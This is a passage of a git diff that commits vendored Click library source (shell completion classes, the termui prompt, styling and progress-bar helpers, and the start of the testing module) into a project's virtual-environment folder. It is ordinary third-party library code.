+ """ + safe_name = re.sub(r"\W*", "", self.prog_name.replace("-", "_"), flags=re.ASCII) + return f"_{safe_name}_completion" + + def source_vars(self) -> t.Dict[str, t.Any]: + """Vars for formatting :attr:`source_template`. + + By default this provides ``complete_func``, ``complete_var``, + and ``prog_name``. + """ + return { + "complete_func": self.func_name, + "complete_var": self.complete_var, + "prog_name": self.prog_name, + } + + def source(self) -> str: + """Produce the shell script that defines the completion + function. By default this ``%``-style formats + :attr:`source_template` with the dict returned by + :meth:`source_vars`. + """ + return self.source_template % self.source_vars() + + def get_completion_args(self) -> t.Tuple[t.List[str], str]: + """Use the env vars defined by the shell script to return a + tuple of ``args, incomplete``. This must be implemented by + subclasses. + """ + raise NotImplementedError + + def get_completions( + self, args: t.List[str], incomplete: str + ) -> t.List[CompletionItem]: + """Determine the context and last complete command or parameter + from the complete args. Call that object's ``shell_complete`` + method to get the completions for the incomplete value. + + :param args: List of complete args before the incomplete value. + :param incomplete: Value being completed. May be empty. + """ + ctx = _resolve_context(self.cli, self.ctx_args, self.prog_name, args) + obj, incomplete = _resolve_incomplete(ctx, args, incomplete) + return obj.shell_complete(ctx, incomplete) + + def format_completion(self, item: CompletionItem) -> str: + """Format a completion item into the form recognized by the + shell script. This must be implemented by subclasses. + + :param item: Completion item to format. + """ + raise NotImplementedError + + def complete(self) -> str: + """Produce the completion data to send back to the shell. + + By default this calls :meth:`get_completion_args`, gets the + completions, then calls :meth:`format_completion` for each + completion. + """ + args, incomplete = self.get_completion_args() + completions = self.get_completions(args, incomplete) + out = [self.format_completion(item) for item in completions] + return "\n".join(out) + + +class BashComplete(ShellComplete): + """Shell completion for Bash.""" + + name = "bash" + source_template = _SOURCE_BASH + + @staticmethod + def _check_version() -> None: + import subprocess + + output = subprocess.run( + ["bash", "-c", 'echo "${BASH_VERSION}"'], stdout=subprocess.PIPE + ) + match = re.search(r"^(\d+)\.(\d+)\.\d+", output.stdout.decode()) + + if match is not None: + major, minor = match.groups() + + if major < "4" or major == "4" and minor < "4": + echo( + _( + "Shell completion is not supported for Bash" + " versions older than 4.4." 
+ ), + err=True, + ) + else: + echo( + _("Couldn't detect Bash version, shell completion is not supported."), + err=True, + ) + + def source(self) -> str: + self._check_version() + return super().source() + + def get_completion_args(self) -> t.Tuple[t.List[str], str]: + cwords = split_arg_string(os.environ["COMP_WORDS"]) + cword = int(os.environ["COMP_CWORD"]) + args = cwords[1:cword] + + try: + incomplete = cwords[cword] + except IndexError: + incomplete = "" + + return args, incomplete + + def format_completion(self, item: CompletionItem) -> str: + return f"{item.type},{item.value}" + + +class ZshComplete(ShellComplete): + """Shell completion for Zsh.""" + + name = "zsh" + source_template = _SOURCE_ZSH + + def get_completion_args(self) -> t.Tuple[t.List[str], str]: + cwords = split_arg_string(os.environ["COMP_WORDS"]) + cword = int(os.environ["COMP_CWORD"]) + args = cwords[1:cword] + + try: + incomplete = cwords[cword] + except IndexError: + incomplete = "" + + return args, incomplete + + def format_completion(self, item: CompletionItem) -> str: + return f"{item.type}\n{item.value}\n{item.help if item.help else '_'}" + + +class FishComplete(ShellComplete): + """Shell completion for Fish.""" + + name = "fish" + source_template = _SOURCE_FISH + + def get_completion_args(self) -> t.Tuple[t.List[str], str]: + cwords = split_arg_string(os.environ["COMP_WORDS"]) + incomplete = os.environ["COMP_CWORD"] + args = cwords[1:] + + # Fish stores the partial word in both COMP_WORDS and + # COMP_CWORD, remove it from complete args. + if incomplete and args and args[-1] == incomplete: + args.pop() + + return args, incomplete + + def format_completion(self, item: CompletionItem) -> str: + if item.help: + return f"{item.type},{item.value}\t{item.help}" + + return f"{item.type},{item.value}" + + +ShellCompleteType = t.TypeVar("ShellCompleteType", bound=t.Type[ShellComplete]) + + +_available_shells: t.Dict[str, t.Type[ShellComplete]] = { + "bash": BashComplete, + "fish": FishComplete, + "zsh": ZshComplete, +} + + +def add_completion_class( + cls: ShellCompleteType, name: t.Optional[str] = None +) -> ShellCompleteType: + """Register a :class:`ShellComplete` subclass under the given name. + The name will be provided by the completion instruction environment + variable during completion. + + :param cls: The completion class that will handle completion for the + shell. + :param name: Name to register the class under. Defaults to the + class's ``name`` attribute. + """ + if name is None: + name = cls.name + + _available_shells[name] = cls + + return cls + + +def get_completion_class(shell: str) -> t.Optional[t.Type[ShellComplete]]: + """Look up a registered :class:`ShellComplete` subclass by the name + provided by the completion instruction environment variable. If the + name isn't registered, returns ``None``. + + :param shell: Name the class is registered under. + """ + return _available_shells.get(shell) + + +def _is_incomplete_argument(ctx: Context, param: Parameter) -> bool: + """Determine if the given parameter is an argument that can still + accept values. + + :param ctx: Invocation context for the command represented by the + parsed complete args. + :param param: Argument object being checked. + """ + if not isinstance(param, Argument): + return False + + assert param.name is not None + # Will be None if expose_value is False. 
+ value = ctx.params.get(param.name) + return ( + param.nargs == -1 + or ctx.get_parameter_source(param.name) is not ParameterSource.COMMANDLINE + or ( + param.nargs > 1 + and isinstance(value, (tuple, list)) + and len(value) < param.nargs + ) + ) + + +def _start_of_option(ctx: Context, value: str) -> bool: + """Check if the value looks like the start of an option.""" + if not value: + return False + + c = value[0] + return c in ctx._opt_prefixes + + +def _is_incomplete_option(ctx: Context, args: t.List[str], param: Parameter) -> bool: + """Determine if the given parameter is an option that needs a value. + + :param args: List of complete args before the incomplete value. + :param param: Option object being checked. + """ + if not isinstance(param, Option): + return False + + if param.is_flag or param.count: + return False + + last_option = None + + for index, arg in enumerate(reversed(args)): + if index + 1 > param.nargs: + break + + if _start_of_option(ctx, arg): + last_option = arg + + return last_option is not None and last_option in param.opts + + +def _resolve_context( + cli: BaseCommand, + ctx_args: t.MutableMapping[str, t.Any], + prog_name: str, + args: t.List[str], +) -> Context: + """Produce the context hierarchy starting with the command and + traversing the complete arguments. This only follows the commands, + it doesn't trigger input prompts or callbacks. + + :param cli: Command being called. + :param prog_name: Name of the executable in the shell. + :param args: List of complete args before the incomplete value. + """ + ctx_args["resilient_parsing"] = True + ctx = cli.make_context(prog_name, args.copy(), **ctx_args) + args = ctx.protected_args + ctx.args + + while args: + command = ctx.command + + if isinstance(command, MultiCommand): + if not command.chain: + name, cmd, args = command.resolve_command(ctx, args) + + if cmd is None: + return ctx + + ctx = cmd.make_context(name, args, parent=ctx, resilient_parsing=True) + args = ctx.protected_args + ctx.args + else: + sub_ctx = ctx + + while args: + name, cmd, args = command.resolve_command(ctx, args) + + if cmd is None: + return ctx + + sub_ctx = cmd.make_context( + name, + args, + parent=ctx, + allow_extra_args=True, + allow_interspersed_args=False, + resilient_parsing=True, + ) + args = sub_ctx.args + + ctx = sub_ctx + args = [*sub_ctx.protected_args, *sub_ctx.args] + else: + break + + return ctx + + +def _resolve_incomplete( + ctx: Context, args: t.List[str], incomplete: str +) -> t.Tuple[t.Union[BaseCommand, Parameter], str]: + """Find the Click object that will handle the completion of the + incomplete value. Return the object and the incomplete value. + + :param ctx: Invocation context for the command represented by + the parsed complete args. + :param args: List of complete args before the incomplete value. + :param incomplete: Value being completed. May be empty. + """ + # Different shells treat an "=" between a long option name and + # value differently. Might keep the value joined, return the "=" + # as a separate item, or return the split name and value. Always + # split and discard the "=" to make completion easier. + if incomplete == "=": + incomplete = "" + elif "=" in incomplete and _start_of_option(ctx, incomplete): + name, _, incomplete = incomplete.partition("=") + args.append(name) + + # The "--" marker tells Click to stop treating values as options + # even if they start with the option character. 
If it hasn't been + # given and the incomplete arg looks like an option, the current + # command will provide option name completions. + if "--" not in args and _start_of_option(ctx, incomplete): + return ctx.command, incomplete + + params = ctx.command.get_params(ctx) + + # If the last complete arg is an option name with an incomplete + # value, the option will provide value completions. + for param in params: + if _is_incomplete_option(ctx, args, param): + return param, incomplete + + # It's not an option name or value. The first argument without a + # parsed value will provide value completions. + for param in params: + if _is_incomplete_argument(ctx, param): + return param, incomplete + + # There were no unparsed arguments, the command may be a group that + # will provide command name completions. + return ctx.command, incomplete diff --git a/env/Lib/site-packages/click/termui.py b/env/Lib/site-packages/click/termui.py new file mode 100644 index 00000000..db7a4b28 --- /dev/null +++ b/env/Lib/site-packages/click/termui.py @@ -0,0 +1,784 @@ +import inspect +import io +import itertools +import sys +import typing as t +from gettext import gettext as _ + +from ._compat import isatty +from ._compat import strip_ansi +from .exceptions import Abort +from .exceptions import UsageError +from .globals import resolve_color_default +from .types import Choice +from .types import convert_type +from .types import ParamType +from .utils import echo +from .utils import LazyFile + +if t.TYPE_CHECKING: + from ._termui_impl import ProgressBar + +V = t.TypeVar("V") + +# The prompt functions to use. The doc tools currently override these +# functions to customize how they work. +visible_prompt_func: t.Callable[[str], str] = input + +_ansi_colors = { + "black": 30, + "red": 31, + "green": 32, + "yellow": 33, + "blue": 34, + "magenta": 35, + "cyan": 36, + "white": 37, + "reset": 39, + "bright_black": 90, + "bright_red": 91, + "bright_green": 92, + "bright_yellow": 93, + "bright_blue": 94, + "bright_magenta": 95, + "bright_cyan": 96, + "bright_white": 97, +} +_ansi_reset_all = "\033[0m" + + +def hidden_prompt_func(prompt: str) -> str: + import getpass + + return getpass.getpass(prompt) + + +def _build_prompt( + text: str, + suffix: str, + show_default: bool = False, + default: t.Optional[t.Any] = None, + show_choices: bool = True, + type: t.Optional[ParamType] = None, +) -> str: + prompt = text + if type is not None and show_choices and isinstance(type, Choice): + prompt += f" ({', '.join(map(str, type.choices))})" + if default is not None and show_default: + prompt = f"{prompt} [{_format_default(default)}]" + return f"{prompt}{suffix}" + + +def _format_default(default: t.Any) -> t.Any: + if isinstance(default, (io.IOBase, LazyFile)) and hasattr(default, "name"): + return default.name + + return default + + +def prompt( + text: str, + default: t.Optional[t.Any] = None, + hide_input: bool = False, + confirmation_prompt: t.Union[bool, str] = False, + type: t.Optional[t.Union[ParamType, t.Any]] = None, + value_proc: t.Optional[t.Callable[[str], t.Any]] = None, + prompt_suffix: str = ": ", + show_default: bool = True, + err: bool = False, + show_choices: bool = True, +) -> t.Any: + """Prompts a user for input. This is a convenience function that can + be used to prompt a user for input later. + + If the user aborts the input by sending an interrupt signal, this + function will catch it and raise a :exc:`Abort` exception. + + :param text: the text to show for the prompt. 
+ :param default: the default value to use if no input happens. If this + is not given it will prompt until it's aborted. + :param hide_input: if this is set to true then the input value will + be hidden. + :param confirmation_prompt: Prompt a second time to confirm the + value. Can be set to a string instead of ``True`` to customize + the message. + :param type: the type to use to check the value against. + :param value_proc: if this parameter is provided it's a function that + is invoked instead of the type conversion to + convert a value. + :param prompt_suffix: a suffix that should be added to the prompt. + :param show_default: shows or hides the default value in the prompt. + :param err: if set to true the file defaults to ``stderr`` instead of + ``stdout``, the same as with echo. + :param show_choices: Show or hide choices if the passed type is a Choice. + For example if type is a Choice of either day or week, + show_choices is true and text is "Group by" then the + prompt will be "Group by (day, week): ". + + .. versionadded:: 8.0 + ``confirmation_prompt`` can be a custom string. + + .. versionadded:: 7.0 + Added the ``show_choices`` parameter. + + .. versionadded:: 6.0 + Added unicode support for cmd.exe on Windows. + + .. versionadded:: 4.0 + Added the `err` parameter. + + """ + + def prompt_func(text: str) -> str: + f = hidden_prompt_func if hide_input else visible_prompt_func + try: + # Write the prompt separately so that we get nice + # coloring through colorama on Windows + echo(text.rstrip(" "), nl=False, err=err) + # Echo a space to stdout to work around an issue where + # readline causes backspace to clear the whole line. + return f(" ") + except (KeyboardInterrupt, EOFError): + # getpass doesn't print a newline if the user aborts input with ^C. + # Allegedly this behavior is inherited from getpass(3). + # A doc bug has been filed at https://bugs.python.org/issue24711 + if hide_input: + echo(None, err=err) + raise Abort() from None + + if value_proc is None: + value_proc = convert_type(type, default) + + prompt = _build_prompt( + text, prompt_suffix, show_default, default, show_choices, type + ) + + if confirmation_prompt: + if confirmation_prompt is True: + confirmation_prompt = _("Repeat for confirmation") + + confirmation_prompt = _build_prompt(confirmation_prompt, prompt_suffix) + + while True: + while True: + value = prompt_func(prompt) + if value: + break + elif default is not None: + value = default + break + try: + result = value_proc(value) + except UsageError as e: + if hide_input: + echo(_("Error: The value you entered was invalid."), err=err) + else: + echo(_("Error: {e.message}").format(e=e), err=err) # noqa: B306 + continue + if not confirmation_prompt: + return result + while True: + value2 = prompt_func(confirmation_prompt) + is_empty = not value and not value2 + if value2 or is_empty: + break + if value == value2: + return result + echo(_("Error: The two entered values do not match."), err=err) + + +def confirm( + text: str, + default: t.Optional[bool] = False, + abort: bool = False, + prompt_suffix: str = ": ", + show_default: bool = True, + err: bool = False, +) -> bool: + """Prompts for confirmation (yes/no question). + + If the user aborts the input by sending a interrupt signal this + function will catch it and raise a :exc:`Abort` exception. + + :param text: the question to ask. + :param default: The default value to use when no input is given. If + ``None``, repeat until input is given. 
+ :param abort: if this is set to `True` a negative answer aborts the + exception by raising :exc:`Abort`. + :param prompt_suffix: a suffix that should be added to the prompt. + :param show_default: shows or hides the default value in the prompt. + :param err: if set to true the file defaults to ``stderr`` instead of + ``stdout``, the same as with echo. + + .. versionchanged:: 8.0 + Repeat until input is given if ``default`` is ``None``. + + .. versionadded:: 4.0 + Added the ``err`` parameter. + """ + prompt = _build_prompt( + text, + prompt_suffix, + show_default, + "y/n" if default is None else ("Y/n" if default else "y/N"), + ) + + while True: + try: + # Write the prompt separately so that we get nice + # coloring through colorama on Windows + echo(prompt.rstrip(" "), nl=False, err=err) + # Echo a space to stdout to work around an issue where + # readline causes backspace to clear the whole line. + value = visible_prompt_func(" ").lower().strip() + except (KeyboardInterrupt, EOFError): + raise Abort() from None + if value in ("y", "yes"): + rv = True + elif value in ("n", "no"): + rv = False + elif default is not None and value == "": + rv = default + else: + echo(_("Error: invalid input"), err=err) + continue + break + if abort and not rv: + raise Abort() + return rv + + +def echo_via_pager( + text_or_generator: t.Union[t.Iterable[str], t.Callable[[], t.Iterable[str]], str], + color: t.Optional[bool] = None, +) -> None: + """This function takes a text and shows it via an environment specific + pager on stdout. + + .. versionchanged:: 3.0 + Added the `color` flag. + + :param text_or_generator: the text to page, or alternatively, a + generator emitting the text to page. + :param color: controls if the pager supports ANSI colors or not. The + default is autodetection. + """ + color = resolve_color_default(color) + + if inspect.isgeneratorfunction(text_or_generator): + i = t.cast(t.Callable[[], t.Iterable[str]], text_or_generator)() + elif isinstance(text_or_generator, str): + i = [text_or_generator] + else: + i = iter(t.cast(t.Iterable[str], text_or_generator)) + + # convert every element of i to a text type if necessary + text_generator = (el if isinstance(el, str) else str(el) for el in i) + + from ._termui_impl import pager + + return pager(itertools.chain(text_generator, "\n"), color) + + +def progressbar( + iterable: t.Optional[t.Iterable[V]] = None, + length: t.Optional[int] = None, + label: t.Optional[str] = None, + show_eta: bool = True, + show_percent: t.Optional[bool] = None, + show_pos: bool = False, + item_show_func: t.Optional[t.Callable[[t.Optional[V]], t.Optional[str]]] = None, + fill_char: str = "#", + empty_char: str = "-", + bar_template: str = "%(label)s [%(bar)s] %(info)s", + info_sep: str = " ", + width: int = 36, + file: t.Optional[t.TextIO] = None, + color: t.Optional[bool] = None, + update_min_steps: int = 1, +) -> "ProgressBar[V]": + """This function creates an iterable context manager that can be used + to iterate over something while showing a progress bar. It will + either iterate over the `iterable` or `length` items (that are counted + up). While iteration happens, this function will print a rendered + progress bar to the given `file` (defaults to stdout) and will attempt + to calculate remaining time and more. By default, this progress bar + will not be rendered if the file is not a terminal. + + The context manager creates the progress bar. When the context + manager is entered the progress bar is already created. 
With every + iteration over the progress bar, the iterable passed to the bar is + advanced and the bar is updated. When the context manager exits, + a newline is printed and the progress bar is finalized on screen. + + Note: The progress bar is currently designed for use cases where the + total progress can be expected to take at least several seconds. + Because of this, the ProgressBar class object won't display + progress that is considered too fast, and progress where the time + between steps is less than a second. + + No printing must happen or the progress bar will be unintentionally + destroyed. + + Example usage:: + + with progressbar(items) as bar: + for item in bar: + do_something_with(item) + + Alternatively, if no iterable is specified, one can manually update the + progress bar through the `update()` method instead of directly + iterating over the progress bar. The update method accepts the number + of steps to increment the bar with:: + + with progressbar(length=chunks.total_bytes) as bar: + for chunk in chunks: + process_chunk(chunk) + bar.update(chunks.bytes) + + The ``update()`` method also takes an optional value specifying the + ``current_item`` at the new position. This is useful when used + together with ``item_show_func`` to customize the output for each + manual step:: + + with click.progressbar( + length=total_size, + label='Unzipping archive', + item_show_func=lambda a: a.filename + ) as bar: + for archive in zip_file: + archive.extract() + bar.update(archive.size, archive) + + :param iterable: an iterable to iterate over. If not provided the length + is required. + :param length: the number of items to iterate over. By default the + progressbar will attempt to ask the iterator about its + length, which might or might not work. If an iterable is + also provided this parameter can be used to override the + length. If an iterable is not provided the progress bar + will iterate over a range of that length. + :param label: the label to show next to the progress bar. + :param show_eta: enables or disables the estimated time display. This is + automatically disabled if the length cannot be + determined. + :param show_percent: enables or disables the percentage display. The + default is `True` if the iterable has a length or + `False` if not. + :param show_pos: enables or disables the absolute position display. The + default is `False`. + :param item_show_func: A function called with the current item which + can return a string to show next to the progress bar. If the + function returns ``None`` nothing is shown. The current item can + be ``None``, such as when entering and exiting the bar. + :param fill_char: the character to use to show the filled part of the + progress bar. + :param empty_char: the character to use to show the non-filled part of + the progress bar. + :param bar_template: the format string to use as template for the bar. + The parameters in it are ``label`` for the label, + ``bar`` for the progress bar and ``info`` for the + info section. + :param info_sep: the separator between multiple info items (eta etc.) + :param width: the width of the progress bar in characters, 0 means full + terminal width + :param file: The file to write to. If this is not a terminal then + only the label is printed. + :param color: controls if the terminal supports ANSI colors or not. The + default is autodetection. This is only needed if ANSI + codes are included anywhere in the progress bar output + which is not the case by default. 
+ :param update_min_steps: Render only when this many updates have + completed. This allows tuning for very fast iterators. + + .. versionchanged:: 8.0 + Output is shown even if execution time is less than 0.5 seconds. + + .. versionchanged:: 8.0 + ``item_show_func`` shows the current item, not the previous one. + + .. versionchanged:: 8.0 + Labels are echoed if the output is not a TTY. Reverts a change + in 7.0 that removed all output. + + .. versionadded:: 8.0 + Added the ``update_min_steps`` parameter. + + .. versionchanged:: 4.0 + Added the ``color`` parameter. Added the ``update`` method to + the object. + + .. versionadded:: 2.0 + """ + from ._termui_impl import ProgressBar + + color = resolve_color_default(color) + return ProgressBar( + iterable=iterable, + length=length, + show_eta=show_eta, + show_percent=show_percent, + show_pos=show_pos, + item_show_func=item_show_func, + fill_char=fill_char, + empty_char=empty_char, + bar_template=bar_template, + info_sep=info_sep, + file=file, + label=label, + width=width, + color=color, + update_min_steps=update_min_steps, + ) + + +def clear() -> None: + """Clears the terminal screen. This will have the effect of clearing + the whole visible space of the terminal and moving the cursor to the + top left. This does not do anything if not connected to a terminal. + + .. versionadded:: 2.0 + """ + if not isatty(sys.stdout): + return + + # ANSI escape \033[2J clears the screen, \033[1;1H moves the cursor + echo("\033[2J\033[1;1H", nl=False) + + +def _interpret_color( + color: t.Union[int, t.Tuple[int, int, int], str], offset: int = 0 +) -> str: + if isinstance(color, int): + return f"{38 + offset};5;{color:d}" + + if isinstance(color, (tuple, list)): + r, g, b = color + return f"{38 + offset};2;{r:d};{g:d};{b:d}" + + return str(_ansi_colors[color] + offset) + + +def style( + text: t.Any, + fg: t.Optional[t.Union[int, t.Tuple[int, int, int], str]] = None, + bg: t.Optional[t.Union[int, t.Tuple[int, int, int], str]] = None, + bold: t.Optional[bool] = None, + dim: t.Optional[bool] = None, + underline: t.Optional[bool] = None, + overline: t.Optional[bool] = None, + italic: t.Optional[bool] = None, + blink: t.Optional[bool] = None, + reverse: t.Optional[bool] = None, + strikethrough: t.Optional[bool] = None, + reset: bool = True, +) -> str: + """Styles a text with ANSI styles and returns the new string. By + default the styling is self contained which means that at the end + of the string a reset code is issued. This can be prevented by + passing ``reset=False``. + + Examples:: + + click.echo(click.style('Hello World!', fg='green')) + click.echo(click.style('ATTENTION!', blink=True)) + click.echo(click.style('Some things', reverse=True, fg='cyan')) + click.echo(click.style('More colors', fg=(255, 12, 128), bg=117)) + + Supported color names: + + * ``black`` (might be a gray) + * ``red`` + * ``green`` + * ``yellow`` (might be an orange) + * ``blue`` + * ``magenta`` + * ``cyan`` + * ``white`` (might be light gray) + * ``bright_black`` + * ``bright_red`` + * ``bright_green`` + * ``bright_yellow`` + * ``bright_blue`` + * ``bright_magenta`` + * ``bright_cyan`` + * ``bright_white`` + * ``reset`` (reset the color code only) + + If the terminal supports it, color may also be specified as: + + - An integer in the interval [0, 255]. The terminal must support + 8-bit/256-color mode. + - An RGB tuple of three integers in [0, 255]. The terminal must + support 24-bit/true-color mode. 
+ + See https://en.wikipedia.org/wiki/ANSI_color and + https://gist.github.com/XVilka/8346728 for more information. + + :param text: the string to style with ansi codes. + :param fg: if provided this will become the foreground color. + :param bg: if provided this will become the background color. + :param bold: if provided this will enable or disable bold mode. + :param dim: if provided this will enable or disable dim mode. This is + badly supported. + :param underline: if provided this will enable or disable underline. + :param overline: if provided this will enable or disable overline. + :param italic: if provided this will enable or disable italic. + :param blink: if provided this will enable or disable blinking. + :param reverse: if provided this will enable or disable inverse + rendering (foreground becomes background and the + other way round). + :param strikethrough: if provided this will enable or disable + striking through text. + :param reset: by default a reset-all code is added at the end of the + string which means that styles do not carry over. This + can be disabled to compose styles. + + .. versionchanged:: 8.0 + A non-string ``message`` is converted to a string. + + .. versionchanged:: 8.0 + Added support for 256 and RGB color codes. + + .. versionchanged:: 8.0 + Added the ``strikethrough``, ``italic``, and ``overline`` + parameters. + + .. versionchanged:: 7.0 + Added support for bright colors. + + .. versionadded:: 2.0 + """ + if not isinstance(text, str): + text = str(text) + + bits = [] + + if fg: + try: + bits.append(f"\033[{_interpret_color(fg)}m") + except KeyError: + raise TypeError(f"Unknown color {fg!r}") from None + + if bg: + try: + bits.append(f"\033[{_interpret_color(bg, 10)}m") + except KeyError: + raise TypeError(f"Unknown color {bg!r}") from None + + if bold is not None: + bits.append(f"\033[{1 if bold else 22}m") + if dim is not None: + bits.append(f"\033[{2 if dim else 22}m") + if underline is not None: + bits.append(f"\033[{4 if underline else 24}m") + if overline is not None: + bits.append(f"\033[{53 if overline else 55}m") + if italic is not None: + bits.append(f"\033[{3 if italic else 23}m") + if blink is not None: + bits.append(f"\033[{5 if blink else 25}m") + if reverse is not None: + bits.append(f"\033[{7 if reverse else 27}m") + if strikethrough is not None: + bits.append(f"\033[{9 if strikethrough else 29}m") + bits.append(text) + if reset: + bits.append(_ansi_reset_all) + return "".join(bits) + + +def unstyle(text: str) -> str: + """Removes ANSI styling information from a string. Usually it's not + necessary to use this function as Click's echo function will + automatically remove styling if necessary. + + .. versionadded:: 2.0 + + :param text: the text to remove style information from. + """ + return strip_ansi(text) + + +def secho( + message: t.Optional[t.Any] = None, + file: t.Optional[t.IO[t.AnyStr]] = None, + nl: bool = True, + err: bool = False, + color: t.Optional[bool] = None, + **styles: t.Any, +) -> None: + """This function combines :func:`echo` and :func:`style` into one + call. As such the following two calls are the same:: + + click.secho('Hello World!', fg='green') + click.echo(click.style('Hello World!', fg='green')) + + All keyword arguments are forwarded to the underlying functions + depending on which one they go with. + + Non-string types will be converted to :class:`str`. However, + :class:`bytes` are passed directly to :meth:`echo` without applying + style. 
If you want to style bytes that represent text, call + :meth:`bytes.decode` first. + + .. versionchanged:: 8.0 + A non-string ``message`` is converted to a string. Bytes are + passed through without style applied. + + .. versionadded:: 2.0 + """ + if message is not None and not isinstance(message, (bytes, bytearray)): + message = style(message, **styles) + + return echo(message, file=file, nl=nl, err=err, color=color) + + +def edit( + text: t.Optional[t.AnyStr] = None, + editor: t.Optional[str] = None, + env: t.Optional[t.Mapping[str, str]] = None, + require_save: bool = True, + extension: str = ".txt", + filename: t.Optional[str] = None, +) -> t.Optional[t.AnyStr]: + r"""Edits the given text in the defined editor. If an editor is given + (should be the full path to the executable but the regular operating + system search path is used for finding the executable) it overrides + the detected editor. Optionally, some environment variables can be + used. If the editor is closed without changes, `None` is returned. In + case a file is edited directly the return value is always `None` and + `require_save` and `extension` are ignored. + + If the editor cannot be opened a :exc:`UsageError` is raised. + + Note for Windows: to simplify cross-platform usage, the newlines are + automatically converted from POSIX to Windows and vice versa. As such, + the message here will have ``\n`` as newline markers. + + :param text: the text to edit. + :param editor: optionally the editor to use. Defaults to automatic + detection. + :param env: environment variables to forward to the editor. + :param require_save: if this is true, then not saving in the editor + will make the return value become `None`. + :param extension: the extension to tell the editor about. This defaults + to `.txt` but changing this might change syntax + highlighting. + :param filename: if provided it will edit this file instead of the + provided text contents. It will not use a temporary + file as an indirection in that case. + """ + from ._termui_impl import Editor + + ed = Editor(editor=editor, env=env, require_save=require_save, extension=extension) + + if filename is None: + return ed.edit(text) + + ed.edit_file(filename) + return None + + +def launch(url: str, wait: bool = False, locate: bool = False) -> int: + """This function launches the given URL (or filename) in the default + viewer application for this file type. If this is an executable, it + might launch the executable in a new session. The return value is + the exit code of the launched application. Usually, ``0`` indicates + success. + + Examples:: + + click.launch('https://click.palletsprojects.com/') + click.launch('/my/downloaded/file', locate=True) + + .. versionadded:: 2.0 + + :param url: URL or filename of the thing to launch. + :param wait: Wait for the program to exit before returning. This + only works if the launched program blocks. In particular, + ``xdg-open`` on Linux does not block. + :param locate: if this is set to `True` then instead of launching the + application associated with the URL it will attempt to + launch a file manager with the file located. This + might have weird effects if the URL does not point to + the filesystem. + """ + from ._termui_impl import open_url + + return open_url(url, wait=wait, locate=locate) + + +# If this is provided, getchar() calls into this instead. This is used +# for unittesting purposes. 
+_getchar: t.Optional[t.Callable[[bool], str]] = None + + +def getchar(echo: bool = False) -> str: + """Fetches a single character from the terminal and returns it. This + will always return a unicode character and under certain rare + circumstances this might return more than one character. The + situations which more than one character is returned is when for + whatever reason multiple characters end up in the terminal buffer or + standard input was not actually a terminal. + + Note that this will always read from the terminal, even if something + is piped into the standard input. + + Note for Windows: in rare cases when typing non-ASCII characters, this + function might wait for a second character and then return both at once. + This is because certain Unicode characters look like special-key markers. + + .. versionadded:: 2.0 + + :param echo: if set to `True`, the character read will also show up on + the terminal. The default is to not show it. + """ + global _getchar + + if _getchar is None: + from ._termui_impl import getchar as f + + _getchar = f + + return _getchar(echo) + + +def raw_terminal() -> t.ContextManager[int]: + from ._termui_impl import raw_terminal as f + + return f() + + +def pause(info: t.Optional[str] = None, err: bool = False) -> None: + """This command stops execution and waits for the user to press any + key to continue. This is similar to the Windows batch "pause" + command. If the program is not run through a terminal, this command + will instead do nothing. + + .. versionadded:: 2.0 + + .. versionadded:: 4.0 + Added the `err` parameter. + + :param info: The message to print before pausing. Defaults to + ``"Press any key to continue..."``. + :param err: if set to message goes to ``stderr`` instead of + ``stdout``, the same as with echo. + """ + if not isatty(sys.stdin) or not isatty(sys.stdout): + return + + if info is None: + info = _("Press any key to continue...") + + try: + if info: + echo(info, nl=False, err=err) + try: + getchar() + except (KeyboardInterrupt, EOFError): + pass + finally: + if info: + echo(err=err) diff --git a/env/Lib/site-packages/click/testing.py b/env/Lib/site-packages/click/testing.py new file mode 100644 index 00000000..e0df0d2a --- /dev/null +++ b/env/Lib/site-packages/click/testing.py @@ -0,0 +1,479 @@ +import contextlib +import io +import os +import shlex +import shutil +import sys +import tempfile +import typing as t +from types import TracebackType + +from . import formatting +from . import termui +from . 
import utils +from ._compat import _find_binary_reader + +if t.TYPE_CHECKING: + from .core import BaseCommand + + +class EchoingStdin: + def __init__(self, input: t.BinaryIO, output: t.BinaryIO) -> None: + self._input = input + self._output = output + self._paused = False + + def __getattr__(self, x: str) -> t.Any: + return getattr(self._input, x) + + def _echo(self, rv: bytes) -> bytes: + if not self._paused: + self._output.write(rv) + + return rv + + def read(self, n: int = -1) -> bytes: + return self._echo(self._input.read(n)) + + def read1(self, n: int = -1) -> bytes: + return self._echo(self._input.read1(n)) # type: ignore + + def readline(self, n: int = -1) -> bytes: + return self._echo(self._input.readline(n)) + + def readlines(self) -> t.List[bytes]: + return [self._echo(x) for x in self._input.readlines()] + + def __iter__(self) -> t.Iterator[bytes]: + return iter(self._echo(x) for x in self._input) + + def __repr__(self) -> str: + return repr(self._input) + + +@contextlib.contextmanager +def _pause_echo(stream: t.Optional[EchoingStdin]) -> t.Iterator[None]: + if stream is None: + yield + else: + stream._paused = True + yield + stream._paused = False + + +class _NamedTextIOWrapper(io.TextIOWrapper): + def __init__( + self, buffer: t.BinaryIO, name: str, mode: str, **kwargs: t.Any + ) -> None: + super().__init__(buffer, **kwargs) + self._name = name + self._mode = mode + + @property + def name(self) -> str: + return self._name + + @property + def mode(self) -> str: + return self._mode + + +def make_input_stream( + input: t.Optional[t.Union[str, bytes, t.IO[t.Any]]], charset: str +) -> t.BinaryIO: + # Is already an input stream. + if hasattr(input, "read"): + rv = _find_binary_reader(t.cast(t.IO[t.Any], input)) + + if rv is not None: + return rv + + raise TypeError("Could not find binary reader for input stream.") + + if input is None: + input = b"" + elif isinstance(input, str): + input = input.encode(charset) + + return io.BytesIO(input) + + +class Result: + """Holds the captured result of an invoked CLI script.""" + + def __init__( + self, + runner: "CliRunner", + stdout_bytes: bytes, + stderr_bytes: t.Optional[bytes], + return_value: t.Any, + exit_code: int, + exception: t.Optional[BaseException], + exc_info: t.Optional[ + t.Tuple[t.Type[BaseException], BaseException, TracebackType] + ] = None, + ): + #: The runner that created the result + self.runner = runner + #: The standard output as bytes. + self.stdout_bytes = stdout_bytes + #: The standard error as bytes, or None if not available + self.stderr_bytes = stderr_bytes + #: The value returned from the invoked command. + #: + #: .. versionadded:: 8.0 + self.return_value = return_value + #: The exit code as integer. + self.exit_code = exit_code + #: The exception that happened if one did. 
